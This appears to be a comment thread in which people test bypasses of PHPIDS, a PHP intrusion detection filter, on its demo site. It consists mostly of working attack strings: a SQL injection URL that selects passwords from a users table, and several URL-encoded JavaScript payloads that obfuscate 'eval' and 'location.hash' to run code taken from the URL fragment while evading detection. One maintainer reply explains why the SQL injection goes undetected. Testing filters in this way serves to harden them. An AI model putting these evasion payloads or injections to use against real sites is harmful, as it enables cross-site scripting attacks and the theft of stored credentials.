I just want to add that this injection still works:
http://demo.php-ids.org/?test=1%20union%20all%20select%20password%20from%20users
--> ?test=1 union all select password from users
(query: SELECT name FROM users WHERE id = $test)

I think queries are more complicated (more columns selected, quotes used) in practice, and more complicated injections will get detected by php-ids, but maybe you'll find a good way to block this without triggering false positives ;))

@Reiners: The problem with your SQL injection is that there are no special chars included - the PHPIDS doesn't monitor strings without special chars due to performance issues. I agree that an SQL injection like this might work under certain circumstances but it would be pretty unusual.

Here's a new one. I wanted to find a way to get the "eval" string using regular expressions... the "exec" function did the trick.
http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F%63%61%74%7E%69%6F%6E%2E%68%7E%61%73%68%2E%73%75%7E%62%73%74%72%69%6E%67%28%31%29%2F%3B%65%3D%2F%2E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%2E%2F%3B%66%3D%65%2E%65%78%65%63%28%64%29%3B%67%3D%66%5B%32%5D%3B%68%3D%66%5B%33%5D%3B%69%3D%66%5B%34%5D%3B%6A%3D%66%5B%35%5D%3B%6B%3D%67%2B%68%2B%69%2B%6A%3B%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%6B%29%29%3B#alert%280%29

gareth: I was just thinking the same thing... here's the injection: http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

I do love the ''+/awef/ trick... brilliant. and the fact that strings are implicit arrays helps a lot too.

You can link to my site at http://p42.us.
Yes, it is getting harder... but still doable: http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%2F%78%2F%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%27%3B%61%3D%61%2B%62%3B%65%3D%31%21%3D%31%3F%2F%78%2F%3A%27%68%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%6F%63%61%74%69%6F%27%3B%63%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6E%27%3B%64%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%68%61%73%27%3B%68%3D%31%21%3D%31%3F%2F%78%2F%3A%27%31%29%27%3B%67%3D%31%21%3D%31%3F%2F%78%2F%3A%27%72%69%6E%67%28%30%27%3B%66%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%73%75%62%73%74%27%3B%62%3D%62%2B%63%2B%64%2B%65%2B%66%2B%67%2B%68%3B%42%3D%30%30%5B%27%27%2B%5B%61%5D%5D%28%62%29%3B%30%30%5B%27%27%2B%5B%61%5D%5D%28%42%29%3B#alert%28/blue_canary_in_the_outlet_by_the_light_switch__who_watches_over_you/%29. :)